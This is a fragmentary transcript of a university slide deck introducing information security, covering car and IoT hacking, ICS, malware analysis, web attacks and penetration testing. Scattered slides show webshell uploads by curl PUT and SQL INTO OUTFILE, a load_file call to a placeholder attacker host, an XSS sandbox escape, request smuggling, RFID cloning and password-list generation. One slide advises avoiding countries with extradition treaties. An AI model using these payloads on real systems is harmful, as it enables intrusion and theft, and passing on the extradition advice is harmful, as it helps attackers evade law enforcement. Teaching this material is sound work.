NCU2020 Information Security 101

Transcript

1. NotSurprised @ NCU [email protected]

2. https://speakerdeck.com/notsurprised/ncu2020-information-security-101

3. > • Background • Penetration Test – Web/Host Scanning –

   Escalate / persistence – Phishing Real-World Invading • Malware Analysis – Get Sample – Static Analysis – Dynamic Analysis • Tool Develop – Blue Team – Red Team – Real Tool • Extradition • Recon – Binary – Sitemap – OSINT • Vulnerability – User – Data – Host Machine • Combination – Combo Attack – POE – Post-Exploitation

4. > NotSurprised Intro • UCCU Hacker • AIS3 2016 trainee

   • HITCON Defend 2018 3rd (etc.) • SITCON 2019 speaker • MOPCON 2019 speaker • LINE Becks.io#5 speaker • iThome CyberSec 2020 speaker • ITRI Engineer (serve my country) • 5-years Bachelor & Master of NSYSU Email : [email protected] Skill • Windows Kernel Driver (Minifilter) • Penetration Test (Web) • Malware Analysis (Ransomware) • Ethereum Smart Contract (Solidity) • Car Security (OMA DM)

5. • • •

6. • • •

7. > Ace Combat 7 : Skies Unknown

8. > credit : sky news

9. > • G-force – Ace pilot should tolerate 9G for

   15s – If pilot cannot keep blood in head • Greyout • Tunnel vision • Blackout • G-LOC • Spoofing IFF (Identification, friend or foe) affiliation to single aircraft or AWACS

10. > credit :

11. > credit :

12. >

13. > • Charlie Miller Jeep Cherokee – Charlie Miller share

    series attack vectors • Tencent KeenLab Tesla Model S • ADCD Key Signal repeat – Proof that signals can be simply trigger and enhance to repeat received signals • PWN2OWN 2019 Tesla Model 3 • Car2go Auto Review Application in Chicago – This connect to server problem, review mechanism can be fraud and unlock the car with fake person id

14. > • RFID • CAN Bus • Bluetooth • Cellular

    Network (Internet) • VANET • OMA DM

15. > Car Internal Communication Car external communication Key Manufacture server

16. >

17. None

18. >

19. > • RFID(Radio Frequency Identification), radio also • In vehicle,

    long distance, usually in high frequencies, UHF root@kali:~# nfc-list nfc-list uses libnfc 1.7.1 NFC device: pn532_uart:/dev/ttyUSB0 opened 1 ISO14443A passive target(s) found: ISO/IEC 14443A (106 kbps) target: ATQA (SENS_RES): 00 04 UID (NFCID1): 3c 3d f1 0d SAK (SEL_RES): 08 root@kali:~# nfc-mfsetuid 3c3df10d NFC reader: pn532_uart:/dev/ttyUSB0 opened Sent bits: 26 (7 bits) Received bits: 04 00 Sent bits: 93 20 Received bits: 0c 5c ee 0d b3 Sent bits: 93 70 0c 5c ee 0d b3 5c c2 Generate fake RFID key RFID Reader with Arduino

20. > • Signal Amplification Relay Attack • Original designed to

    copy for backup and become all in one RFID key in personal used • Can copy 125 kHz (“low frequency”) RFID • Can not copy 13.56MHz (“high frequency”) NFC

21. >

22. >

23. >

24. > • Best way to get into CAN bus –

    Compromise the car’s mini computer ( OS: QNX, Win CE, Linux, Android, Green Hills) – As a component in car, mini computer connect to CAN bus and dash board • Message on CAN bus system – CAN message format • ISO 11519-2 / ISO 11898:1993 / ISO 11898:1995 • Make largest privilege code in your broadcast packet – Diagnostic trouble code format • Sometime trigger automatic reaction • Aircraft also use CAN bus – Same problem that microcontroller is the last defend line in simple aircraft

25. >

26. > • CAN – ISO-TP (ISO 15765-4) – CANopen –

    GMLAN bus • SEA J1850 – PWN – VPW • KWP – KWP2000 (ISO 9141-2) – ISO 14230-4 • LIN Bus • MOST – Independent from bus line, for IVI, connect to speaker and cellular network. • FlexRay • Ethernet

27. > credit :

28. > • FlexRay bus – Fastest – Expensive – Top

    class car – Sensitive • CAN bus – Good CP value – Widely used credit :

29. > • OBDII (On-Board Diagnostic System II) ft. EcomCat credit

    :

30. > ECOM2 OBDII Cable US $203.37 ValueCan3 OBDII Cable US

    $395.00

31. > ELM327 OBDII Cable US $8.40~$2.50

32. > Expensive OBD2 Cable Cheap OBD2 Cable Normal Limited Usually

    not Sometimes GUI / Auto Link Open Source / Self-defined High Low (china copycat) Yes No Lots None Yes None

33. > Some interesting tool: • ICSim: Instrument Cluster Simulator –

    For Can

34. > • MyCar, CarDoctor, Car Scanner – Type of product

    connect to OBDII and APP – Control your car’s status to prevent frauded by repair shop – Usually Bluetooth(shorter distance, more secure), WIFI/3G/4G – As IoT, default AC/PW remain problem – Bluetooth default paring key: 0000/1234 (sometime even not give a request)

35. > • Using uuid and handle (company identifier) primary and

    characteristic command. • Sometime you can brutal force it or OSINT for hint. • MiBand2 no auth key, MiBand3 has breakable auth key.

36. > • Torque • Car scanner • OBD Auto Doctor

37. > • ELM327 OBD2 BLE • Cannot change PIN •

    Support several client APP credit :

38. > • ELM327 OBD2 WiFi • Default IP & Port

    • Support several client APP

39. >

40. None

41. > credit : Semantic

42. > • Not just Bluetooth, also using GPS and a

    cellular connection to extend their range to anywhere with an internet connection. credit :

43. > • Acoount & Password is default in factoryBootstrap and

    popular • User Guide which contain AC/PW public on internet – https://fccid.io/2AEB4AG21/User-Manual/User-manual-3104674 credit :

44. > • Such Vulhub website provide by MyCar Vendors credit

    :

45. > • SQLi to other account and launch other’s car

    engine by web API credit :

46. credit : BUG BUG CVE CVE MyCar Vendor MyCar Vendor

    MyCar Vendor MyCar Vendor
47. None
48. None

49. > credit : Automotive Electronics

50. > credit :

51. > credit : LGACL Simulator

52. Vehicular Ad Hoc Network On-Board Unit, OBU Road Side Unit,

    RSU • On board device to receive/send message system • Combined with sensors • microcontroller, speed sensor, brake sensor, radar, GPS, etc… • Road side sensor to receive/send message system • Has computing abilities • Co-work with OBU to make V2V communication happened • RSU can connect to central control center to make road state under control > credit : yenchih.kuo@NSYSU

53. • Communication between car：Vehicle to Vehicle, V2V • Communication between

    car and road：Vehicle to infrastructure, V2I • Dedicated Short Range Communications (DSRC) • 5.85GHz~5.925GHz • Infrared、RFID、IEEE802.11p、IEEE1609 • in IEEE1609.x Wireless Access in the Vehicular Environment (WAVE) • Transmission Rate：3~27Mbps • Most Range：1km > credit : yenchih.kuo@NSYSU

54. > • Every sec, car will delivered its own basic

    info. Including highway ID, delivered time, position, speed. • Attacker can overwrite Beacon info to make MDS make mistake. • Therefore, vehicle need to confirm pkg from valid node, and check checksum. VANET Attack can conclude into 5 phases: • Abnormal Data Check • Alert Check • Node Oriental Detecting Method • Data Oriental Detecting Method • Privacy

55. > In next section →

56. > In next section →

57. > • JTAG – A kind of debugging protocol, can

    download and upload the firmware, find the PIN on manual • JTAGulator – A tool to help researcher find the JTAG PIN on chip credit : attify

58. > • SWD (serial wire debug) – A kind of

    debugging protocol, support by STM32F4 series (STM32F4 is the most widely used car chip) • STM32F4 Discovery Kit – A debug tool provide by ST themself credit : st

59. > • IVI (In-Vehicle Information System) • MCU (Microcontroller Unit)

    credit : iotm2mcouncil

60. > MobilePhone / Server HMI MicroController HTTP Modbus Canbus Device

    PLC ECU No No / TLS1.2 No Strong Normal Weak Lots Few Few *Public Private *Public *Few *Few Lots Remote / Extranet Remote / Extranet Physical / Short-dist / Remote

61. > • Most are targeted attack • Vehicle security base

    on close-source and inconsistency, just like OT • Revenue is totally different class in IoT device, worth targeted attack • As AI raise, automatous vehicle definitely need standards to connect to the road system and collect info for AI, therefore, it bring problems in security

62. >

63. >

64. >

65. >

66. • • •

67. > • HTTP sniffer than you will get the AC/PW

    • Door seq. being shown on URL query as plaintext • Even you have no AC/PW, you can unlock most door remote by SQLi • There's a password to switch to setting mode on product’s user manual, you can find it on internet. e.g. #123456#

68. >

69. > • A human-readable JSON protocol “encrypted” with an easily

    reversible autokey (-85) XOR cipher and a binary DES-encrypted configuration (AC/PW : admin/admin)

70. • • •

71. > • SCADA vs DCS – SCADA, Supervisory Control and

    Data Acquisition System, cross fabs, work with DCS, PCS, ECS (network isolate?) – DCS, Distributed Control System, usually in same fab, but distribute control • IT (information technology): – Layer 5 Enterprise Network: • firewall, WAF, IPS, IDS – Layer 4 Enterprise server: • DMZ, AD server, Patch server, Web Server • OT (operation technology): – Layer 3 manufacturing operation & control: • FactoryTalk Server, Engineer Workstation – Layer 2 Area Supervisory control: • Router, switch, HMI, FactoryTalk Client – Layer 1 Control: • Batch Control, Safety Control, Driver Control, PLC – Layer 0 Process: • Sensor, Driver, Robot

72. > Level 5 Level 4 Level 3 Level 2 Level

    1 Level 0 Enterprise Network Enterprise Servers Site Manufacturing Operation and Control Area Supervisory Control Control Process DMZ Email, Internet, etc. Web Services Application Servers Historian Mirror Firewall Terminal Services Patch Management Primary Historian Factory Talk Application Server Engineering Workstations Factory Talk Client HMI Factory Talk Client HMI Batch Control Discreate Control Driver Control Continuous Process Control Safety Control Actuators Drivers Sensors Robots

73. > Level 5 Level 4 Level 3 Level 2 Level

    1 Level 0 Enterprise Network Enterprise Servers Site Manufacturing Operation and Control Area Supervisory Control Control Process DMZ Email, Internet, etc. Web Services Application Servers Historian Mirror Firewall Terminal Services Patch Management Primary Historian Factory Talk Application Server Engineering Workstations Factory Talk Client HMI Factory Talk Client HMI Batch Control Discreate Control Driver Control Continuous Process Control Safety Control Actuators Drivers Sensors Robots Information Technology Operational Technology

74. > • PLC Structure – CPU – 程式記憶體 Process Memory

    – 系統記憶體 System Memory – 元件記憶體 Component Memory – 資料記憶體 Data Memory (最常被攻擊的位置, Usually) • Instances – 2010 伊朗 Stuxnet – 2014 德國煉鋼 German Steel 日本文殊 Japan Fugen Nuclear – 2015 烏克蘭核電廠 Ukraine Nuclear – 2018 臺積電 TSMC • CyberX Report – 57% AntiVirus cannot update VirusHash DB – 53% still use WinXP

75. > • ICS Protocols – At least hundreds – Few

    open resource – No sharing with self-defined protocols (even diff types in same company) – Fieldbus, wireless, RS232 serial port frequency, etc… • Modbus TCP – Modbus structure like TCP – Major part is Function Code – Function Code only has few code defined in protocol, vendors can still use alternative codes (self-defined) – New Version will include HTTPS

76. • • •

77. • • •

78. >

79. >

80. >

81. > • DEFCON27 DEVCORE Principle Researcher Orange & Researcher Meh

    find SSL VPN vulnerability • Win the “Pwnie Awards” (Oscar in Information Security)

82. • • •

83. >

84. >

85. > Remote Code Execution • Vulnerabilities on existed services •

    No need with click bait • Usually need PoE from user privilage Phishing • Picnic (problem in chair, not in computer) • Need click bait • Usually also get AD privilege with click bait (UAC)

86. • • •

87. > Victim Email Victim

88. > Hacker Server Hacker Server

89. >

90. > ↑ ↓

91. > Victim Victim

92. >

93. • • •

94. >

95. • • •

96. ──

97. > • Microsoft Server Message Block 1.0 (SMBv1) server handles

    certain requests • tcp port 445 • srvnet在接收包的時候就會在a1字節後存放0xffdff000指標，而 0xffdff000這個地址存入客戶端發送來的資料。 • srv.sys 在處理 SrvOs2FeaListSizeToNt 的時候邏輯不正確導 致複製貼上越界覆蓋，造成可執行shellcode。 unsigned int __fastcall SrvOs2FeaListSizeToNt(int pOs2Fea) { …… Length = *(_DWORD *)pOs2Fea; …… *(_WORD *)pOs2Fea = pBody - pOs2Fea; …… } Typical Ransomware Eternal Blue = WannaCry

98. > • 首先關閉指定進程，避免某些重要文件因被佔用而無法感染。(Mail跟DB)

99. > • 木馬在網絡上設置了一個開關，當本地計算機能夠成功訪問 http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com 時，退出進程，不 再進行傳播感染。

100. > I’m About to End This Ransomware!!!

101. > Step 1. 收集病毒情報 • 疫情、感染範圍、發作情形、併發症狀 Step 2. 收集病毒樣本 •

     分辨是下載器還是病毒本體 • 足夠的初階樣本分析可以有效提升對高階樣本混淆的推測直覺 • 根據批露資料自撰病毒樣本 (記得不要 open source) Step 3. 靜態分析 • 反組譯拆解: 監測模組、持續性模組、傳播模組、反連模組 Step 4. 建立檢測環境 • 建立 fake C&C server (如果有需求) • 設置激活開關 (IP位置、具漏洞之Service) • 模擬受害情境 (一般使用者、IoT、產線HMI/PLC、Server) Step 5. 動態分析 • 掛載啟動 Log/Debug 功能的所有工具 (syscalls、network) • 想辦法回收數據 (BSoD、Encrypt、ForceReboot)

102. >

103. > • MoWare ransomware & Franzi ransomware

104. > IAT existed API directly calling No shell pack No

     obscuration Source comparable IAT destroyed API magic calling Heavy shell pack Lots obscuration BlackBox

105. >

106. • • •

107. > • 惡意樣本為了避免被鑑識 常常會檢查當下機器狀態 – 虛擬機設置 – 除錯模式 – 沙箱版本

     • 當然還有一些混淆寫法編 譯後的函式呼叫方式

108. > • 同家族 data structure (collapsed, need fix) • 結構、項目量、不同

     Developer 具有微妙差異可分辨家族 (很多時 候還是很難分辨)

109. > • 不同家族 data structure

110. > • 同家族 call flow 67f49ece27415c9646ddf5aa3037d67e28b2252d0d2c577e7e89c5ec2154b0bc cf262a9236eaf5230c219845823f36fd8c8e8b77ba882c34ce38a5087539cf71

111. > • 不同家族 call flow 具有一定程度的反逆向保護，所以無法完整生成 call graph (考驗逆向功力的時刻)

112. > • 混淆技術 (obscuration)： – 將程式的代碼，轉換成一種功能上等價，但是難於閱讀和理解的形式 • 加殼技術 (shell packer)：

     – 一種對EXE檔案的數據壓縮及加密保護，可自我解壓檔案，並能隱藏解壓進程 – 有些加殼還會加上混淆的技術或概念，例如 VM Shell 將 ASM 完全加密，只剩 FDE • 2006 年時就有 80%~90% 的惡意軟體使用加殼技術，其中 50% 使用大眾技術或 舊加殼，但相信現在這比率更高。使用 Entropy、Signature、 PE header 偵 測加殼等方式皆有缺陷。防毒軟體對於任何新出的加殼技術防禦能力較低 • 混淆是所有良性軟體開發者與惡意軟體開發者的基本要求，一定程度的混淆能減 少開發技術被解譯拷貝竊取

113. > • Save Load 大法 – 將真實指令位置存在 Stack 上，然後在需要時讀出使用 •

     流程混淆 – 跟甩開跟蹤的繞路一樣，運用一些等價但反組譯辨認較弱的跳轉或 register 搬移使反組譯結果 無法直視 ( eg. call xxx = push retAddr; push xxx; ret ) • 字串混淆 – 初階的換編碼，進階的會用算的生成字串 • 反ASM2C – 藉由一些反組譯工具在辨認上會誤會的技巧來使工具無法順利反組譯成 C code • IAT (import address table) – 破壞 IAT 可避免被快速看出意圖並且增加靜態查找 entries 困難，藉由動態計算偏移重新填入 IAT 使程式運行 • Structure Exception Handling (SEH) – try, exception, __finally 跟 SL 大法類似，返回錯誤點重新執行，只是 Jump 的目的是自 建予 CPU 的 IDT List (TIB fs:[0])，另外這種 JUMP 不用 Jmp、Jl、Je 等 ASM，而 Catch Handler 還可於被反編回 C 時被工具視為無用而捨棄(然而異常處理仍可被執行) – 某些時候可供病毒用來偵測是否掛載了 debugger

114. > • UPX – UPX 是一個以 command line 方式操作的免費壓縮軟體，使用一種叫做 UCL

     的壓縮算法。UCL 最大的好處就是在壓縮及解壓縮的過程中不需要額外的內存，UPX 目有 DOS、Linux 以及 Windows 版本。 • Armadillo – 是一款應用面很廣的商業殼，可以為程式加上使用時間，次數以及啟動畫面等設定，他的保護功 能其中一項稱為 Nanomite。 – Nanomite 技術能夠標記某些程式區段，將這些區段做混淆並寫入記憶體中。對於原本應該是這些 程式碼所在的地方則改為 jump。在壓縮前殼再將這些 jump 改為 int 3（op code 為 0xCC） 的程式中斷點並紀錄這些標記。 – Import table Elimination 也是 Armadillo 使用的技術之一。 由於分析師能夠依據程式 import table 裡的 APIs 猜測到這隻程式的意圖，破壞原本程式的 import table 就能夠增 加反編譯的困難。這項技術在私有殼中也十分常見。 • VM Protector – 以類似於 Java、Python 的 VM Agent (FDE) 來解譯每行加密過的 ASM (vOpCode) 指令。

115. • • •

116. > Free EDR • SysMon • Wazuh Windows Tools •

     Process Monitor • Process Explorer • Procexp • Autoruns NetWorkSniffer • MITM Proxy • TCPViewer • Nirsoft TCPLogView(有log)

117. >

118. >

119. > ANY.RUN

120. • • •

121. • • •

122. > • • • • • •

123. > Windows ~= Microkernel + LibOS ~= Monolithic Like

124. > • Extension Register • Kernel Dispatcher • CommunicationUK •

     Degree (Altitude) • Events • Handlers

125. >

126. • • •

127. > • • • • • • • •

128. >

129. >

130. • • •

131. > • • • • •

132. > • Signal Amplification Relay Attack • Original designed to

     copy for backup and become all in one RFID key in personal used • Can copy 125 kHz (“low frequency”) RFID • Can not copy 13.56MHz (“high frequency”) NFC

133. >

134. >

135. >

136. >

137. • • •

138. >

139. >

140. > 避開自身隸屬國家或具引渡條例之國家

141. >

142. >

143. >

144. >

145. >

146. • • •

147. > • ASM executable -> C • IDA pro [f15]

     Cpp source IDA Pro disassembling to C IDA Pro ASM Binary

148. > • .Net executable -> C# • Telerik Just Decompiler

149. > • .pyc -> .py • Uncompyle6

150. > • UPX – UPX 是一個以 command line 方式操作的免費壓縮軟體，使用一種叫做 UCL

     的壓縮算法。 UCL 最大的好處就是在壓縮及解壓縮的過程中不需要額外的內存，UPX 目有 DOS、Linux 以 及 Windows 版本。 • Armadillo – 是一款應用面很廣的商業殼，可以為程式加上使用時間，次數以及啟動畫面等設定，他的保護 功能其中一項稱為 Nanomite。 – Nanomite 技術能夠標記某些程式區段，將這些區段做混淆並寫入記憶體中。對於原本應該是 這些程式碼所在的地方則改為 jump。在壓縮前殼再將這些 jump 改為 int 3（op code 為 0xCC）的程式中斷點並紀錄這些標記。 – Import table Elimination 也是 Armadillo 使用的技術之一。 由於分析師能夠依據程 式 import table 裡的 APIs 猜測到這隻程式的意圖，破壞原本程式的 import table 就 能夠增加反編譯的困難。這項技術在私有殼中也十分常見。 • VM Shell – 以類似於 Java、Python 的 VM Agent (FDE) 來解譯每行加密過的 ASM (vOpCode) 指令。

151. > OEP SEP Orginal Entry Point Shell Entry Point

152. > B83D6458 778137EC 00732218 778786D0 006DFA24 CFC00910 006DFA44 006DFA48 006DFA4C

     006DFA50 006DFA54 006DFA58 <Unknown vOpCode> <Unknown vOpCode> <Unknown vOpCode> <Unknown vOpCode> <Unknown vOpCode> <Unknown vOpCode> EIP VM Shell vOpcode decoder Data c3 006DFA44 ret

153. • • •

154. > • 以Web來說，地毯式掃描的目 標除了近乎已知的80/443， 重要的是: – FTP - 用於上傳網站檔案 –

     SQL - 動態網站資料庫 – SSH - 遠端登入修改網站 – RDP - 遠端登入修改網站 – SMB - 用於上傳網站檔案

155. > • 有許多API或是微服務的位置處 於SubDoamin，且於轉址中一瞬 即逝，需要工具紀錄。 • 因為認證與接收值的位置通常在 這些地方，會比一般使用者接觸 的網頁表面更多潛在漏洞。

156. > • 有許多框架的後台服務幾乎是 與前台網站切割開的，無法藉 由前端爬蟲找到入口。 • 使用框架字典進行路徑爆破可 以找到後台位置。

157. • • •

158. >

159. None
160. None
161. None
162. None
163. None
164. None

165. >

166. >

167. >

168. >

169. >

170. >

171. >

172. >

173. >

174. >

175. None
176. None

177. country:"Taiwan" city:"Taichung" IP Webcam Server

178. insecam

179. None
180. None
181. None

182. • • •

183. None

184. > 爆破常用字詞丟入hashcat搭配Hob0Rules生成密碼 • 姓名 • 生日 • 身分證字號 • 常用信箱

     • 工號 • 公司英文縮寫 hashcat --stdout password.txt -r /usr/share/hashcat/rules/hob064.rule -o password-new.txt --force • 反向 –r • 大寫 –u • 小寫 -l • 末尾加字符 -$ITRI • 開頭加字符 -^ITRI • 重覆2次 –p2
185. None

186. >

187. >

188. >

189. >

190. >

191. • • •

192. >

193. >

194. >

195. ( )

196. > • 疊透明按鈕在引用的網頁畫面上方

197. > • 建立區域性釣魚網站跳轉劫持來的登入頁 面。 • 可搭配Self-XSS在劫持來的Form加入 Hidden iframe 本區域警示網站資料引用自政府民生物聯網。 ※偷取到一次來自使用者自發點擊的執行能力

198. ( )

199. > ( ) • Stored-XSS – 儲存於網站資料庫，影響所有瀏覽用戶

200. None

201. > • ?query=&lcub;&lcub;a='constructor';b=&lcub;&rcub;;a.sub.call.call(b[a].getOwnPrope rtyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert()')()}}

202. >

203. None

204. > • Philips Hue lighting system Login User Other User

205. None

206. > • TP-LINK Smart Plug

207. ( )

208. > www.itriweb.org/login.php itriweb.org User 1. User Login 2. AC/PW 3.

     Cookie

209. >

210. > Hacker Own www.itriweb.org/login.php itriweb.org User 1. User Login 2.

     AC/PW 3. Cookie www.coupon.com/index.php 4. Open Url

211. > www.coupon.com/index.php

212. > www.itriweb.org/login.php itriweb.org User 1. User Login 2. AC/PW 3.

     Cookie www.coupon.com/index.php 4. Open Url Hacker Own 5. Cookie & ChangeAccountUrl

213. > • API Token in the request form, not only

     login Token. • Check request’s referer in header. • Also setting HTTPONLY flag to prevent XSS steal the cookie from user.

214. ( )

215. > Request URL from User by Server

216. > Private Network Server (e.g. FTP, Mail Server) Hacker URL

     Dealer (e.g. Hyperlink, Graph) X Firewall (e.g. WAF, IPS, DMZ)

217. > Private Network Server (e.g. FTP, Mail Server) Hacker URL

     Dealer (e.g. Hyperlink, Graph) Firewall (e.g. WAF, IPS, DMZ)
218. None

219. > • 在 HTTP1.0 之前的協議設計中，客 戶端每進行一次HTTP請求，就需要同 一個服務器建立一個TCP鏈接。而現代 的網站頁面是由多種資源組成的，我 們要獲取一個網頁的內容，必須要請 求HTML文檔，還有JS，CSS，圖片等

     多種的資源，這樣如果按照之前的協 議設計，就會導致HTTP服務器的負載 增加。於是在 HTTP1.1 中，增加了 Keep-Alive和Pipeline這兩個特性。 No Pipelining Client Server Pipelining Client Server Open Open Close Close

220. > • Transfer-Encoding (TE) POST /xxx HTTP/1.1 Host: xxx Content-Type:

     text/plain Transfer-Encoding: chunked 4\r\n Wiki\r\n 5\r\n pedia\r\n e\r\n in\r\n\r\nchunks.\r\n 0\r\n \r\n Header Body 1st chunk 2nd chunk 3rd chunk chunk close Length Content

221. > Keep-Alive Client Middleware Server No Pipelining req A req

     B req C req A req B req C resp A resp A resp B resp B resp C resp C Backend (e.g. LAMP) User Middleware (e.g. CDN, Proxy)

222. > printf 'GET / HTTP/1.1\r\n'\ 'Host: localhost\r\n'\ 'Content-length: 58\r\n'\ 'Transfer-Encoding:

     chunked\r\n'\ 'Token: YYYYYY\r\n\r\n'\ '0\r\n'\ '\r\n'\ 'GET /API HTTP/1.1\r\n'\ 'Host: localhost\r\n'\ 'Dummy: Header\r\n'\ '\r\n'\ 'GET /info HTTP/1.1\r\n'\ 'Host: localhost\r\n'\ 'Token: XXXXXX\r\n'\ '\r\n'\ | nc –q1 127.0.0.1 8787 GET / HTTP/1.1[CRLF] Host: localhost[CRLF] Content-length: 58[CRLF] Transfer-Encoding: chunked[CRLF] Token: YYYYYY[CRLF] [CRLF] 0[CRLF] [CRLF] GET /API HTTP/1.1[CRLF] Host: localhost[CRLF] Dummy: Header[CRLF][CRLF] GET /info HTTP/1.1[CRLF] Host: localhost[CRLF] Token: XXXXXX[CRLF][CRLF]

223. > (ignored or removed) (start of 58 bytes of body

     with 0) (end of 58 bytes of body, not parsed) Body Header Middleware Content-Length first. GET / HTTP/1.1[CRLF] Host: localhost[CRLF] Content-length: 58[CRLF] Transfer-Encoding: chunked[CRLF] Token: YYYYYY[CRLF] [CRLF] 0[CRLF] [CRLF] GET /API HTTP/1.1[CRLF] Host: localhost[CRLF] Dummy: Header[CRLF][CRLF] GET /info HTTP/1.1[CRLF] Host: localhost[CRLF] Token: XXXXXX[CRLF][CRLF]

224. > GET / HTTP/1.1[CRLF] Host: localhost[CRLF] Content-length: 58[CRLF] Transfer-Encoding: chunked[CRLF]

     Token: YYYYYY[CRLF] [CRLF] 0[CRLF] [CRLF] GET /API HTTP/1.1[CRLF] Host: localhost[CRLF] Dummy: Header[CRLF][CRLF] GET /info HTTP/1.1[CRLF] Host: localhost[CRLF] Token: XXXXXX[CRLF][CRLF] Backend Transfer-Encoding first, in RFC 7230 (Chunk End)

225. > GET / HTTP/1.1[CRLF] Host: localhost[CRLF] Content-length: 58[CRLF] Transfer-Encoding: chunked[CRLF]

     Token: YYYYYY[CRLF] [CRLF] 0[CRLF] [CRLF] GET /API HTTP/1.1[CRLF] Host: localhost[CRLF] Dummy: Header[CRLF][CRLF] GET /info HTTP/1.1[CRLF] Host: localhost[CRLF] Token: XXXXXX[CRLF][CRLF] (Chunk End) Backend Transfer-Encoding first, in RFC 7230 (sending payload, replace /r/n here.)

226. > (ignored or removed) (start of 58 bytes of body

     with 0) (end of 58 bytes of body, not parsed) Body Header Middleware Content-Length first. GET / HTTP/1.1[CRLF] Host: localhost[CRLF] Content-length: 58[CRLF] Transfer-Encoding: chunked[CRLF] Token: YYYYYY[CRLF] [CRLF] 0[CRLF] [CRLF] GET /API HTTP/1.1[CRLF] Host: localhost[CRLF] Dummy: Headerxxxx GET /info HTTP/1.1[CRLF] Host: localhost[CRLF] Token: XXXXXX[CRLF][CRLF]

227. > GET / HTTP/1.1[CRLF] Host: localhost[CRLF] Content-length: 58[CRLF] Transfer-Encoding: chunked[CRLF]

     Token: YYYYYY[CRLF] [CRLF] 0[CRLF] [CRLF] GET /API HTTP/1.1[CRLF] Host: localhost[CRLF] Dummy: Headerxxxx GET /info HTTP/1.1[CRLF] Host: localhost[CRLF] Token: XXXXXX[CRLF][CRLF] (Chunk End) Backend Transfer-Encoding first, in RFC 7230 (sending payload, replace /r/n here.)

228. Backend (e.g. LAMP) User Middleware (e.g. CDN, Proxy) Hacker

229. Backend (e.g. LAMP) User Middleware (e.g. CDN, Proxy) Hacker POST

     Token POST Token

230. Backend (e.g. LAMP) User Middleware (e.g. CDN, Proxy) Hacker POST

     Token Pass Unauthenticated API request POST Token API Request

231. >

232. • • •

233. None

234. >

235. >

236. >

237. None

238. >

239. • • •

240. None

241. >

242. >

243. None

244. > • curl -v -X OPTIONS http://192.168.227.134/test/

245. > • curl -v -X PUT -d '<?php system($_GET["cmd"]); ?>'

     http://192.168.227.134/test/shell.php

246. > Replace Existed Page with Reverse Shell

247. None

248. >

249. >

250. >

251. >

252. >

253. • • •

254. > Read File /etc/passwd /.ssh/id_rsa Brutal-Force Passwords with Accounts Use

     key to SSH Upload Script Try to make a reverse shell e.g. ssh [email protected] –i id_rsa

255. > Read File SQLi /var/www/web /connect.config Sell Data DataBase e.g.

     SELECT "<? echo passthru($_GET['cmd']); ?>" INTO OUTFILE '/var/www/shell.php’ SELECT load_file('\\\\YOUR.IP.GOES.HERE\\shell.php’); SELECT sys_exec('usermod -a -G admin UserA'); Try to make a reverse shell DoS e.g. SELECT * From TableA, TableB, TableC, TableD, TableE, TableF; $$

256. > • select sys_exec('usermod -a -G admin UserA');

257. > baike.baidu.com/login.php User 1. User Login 2. AC/PW 3. Cookie

     www.coupon.com/index.php 4. Open Url Hacker Own Self-XSS + CSRF 5. Cookie & Edit Self-XSS and Trigger baike.baidu.com 6. Retrieve Baidu bduss (core cookie)

258. > • Wordpress CVE-2019-6977 Crafted Image 2. Through Dir write

     file [_wp_attached_file] & [Edit] 1. Login to admin panel Theme Folder 3. Template Include [_wp_page_template] Return Shell Arbitrary WriteFile + Local File Including

259. > • Mongo-express CVE-2019-10758 Unauthenticated API + Command Injection

260. • • •

261. None

262. >

263. None

264. > • User • Shellcode • Root

265. • • •

266. > • June 2017: Ransomware attack on Maersk • June

     2018: NotPetya attack on Saint-Gobain • March 2019: LockerGoga attack on Norsk Hydro • May 2019: RobinHood attack on Baltimore City

267. >

268. > credit: Unknown

269. credit: backlion

270. > • 內對內未做網段隔離 • 重要主機對內無防護措施可輕易橫向移動 • 未設置 RDP gateways •

     可以遠端執行程式的服務(WRM, WMIC, PSEXEC, RDP)未管控登入與登入 者群組以及權限 • 未限制可遠端登入上列服務(WRM, WMIC, PSEXEC, RDP)之網域範圍 • 未設定 GPO 降低上述具遠端執行能力之服務的 timeouts sessions • 重要主機控管登入權限未搭配 Multi-factor Authentication，如 SmartCard 或 計算而來的 Token • 因方便而使單一使用者具備多機器的 Local Administrator 權限

271. > • 以Event來說，Remote Access 通常分 "建立連線", "認證", "登入" • 認證的授權分為只有帳密或是帳密帶

     Token 的 • 使用 SmartCard 為輸入 Token 的一種方式，其他有 NTLM、Kerberos 兩 種認證方式 • SmartCard長期連接未卸除，可由遠端 HelpDesk admin 竊取 Token • 駭客可用 Mimikatz 盜取 NTLM 的 Hash 來執行 WRM, WMIC, PSEXEC • 駭客可用 Mimikatz 盜取機器 Hash 來請 DC 產生 Kerberos Ticket 用以 通過 Kerberos 認證 .#####. mimikatz 2.1.1 (x64) built on Nov 12 2017 15:32:00 .## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] ) ## \ / ## > http://blog.gentilkiwi.com/mimikatz '## v ##' Vincent LE TOUX ( [email protected] ) '#####' > http://pingcastle.com / http://mysmartlogon.com ***/

272. > credit: BloodHound

273. • • •

274. > Real Network Force • USA NSA • China APT3

     (a.k.a. Gothic Panda) • Russia APT28 (Hillary Clinton campaign) • Vietnam APT32 (a.k.a. SeaLotus, Toyota global incident) • TW 資通電軍, 調查局資訊科學組, 國安局資訊組

275. > 國內資安會議 • HITCON CMT • HITCON Pacific • TDoH

     conf • DEVCORE conf (篩選制) • 國際資訊安全組織台灣高峰會 • iThome資安大會 國外資安會議 • SECCON (JP) • CodeBlue (JP) • CCC (GM) • DEFCON (US) • BlackHat (Global: USA、Asia、神州、Europe) 國內技術研討會 • COSCUP • SITCON • MOPCON • PYCON TW • RubyCON • JSDC • RedHat Taiwan • Symantec Taiwan • DevOpsDaysAsia Taipei • vForumTW

276. > & • 教育部 AIS3 暑期訓練營 – 仿造韓國 BoB 的資安訓練營，有線上前測，前

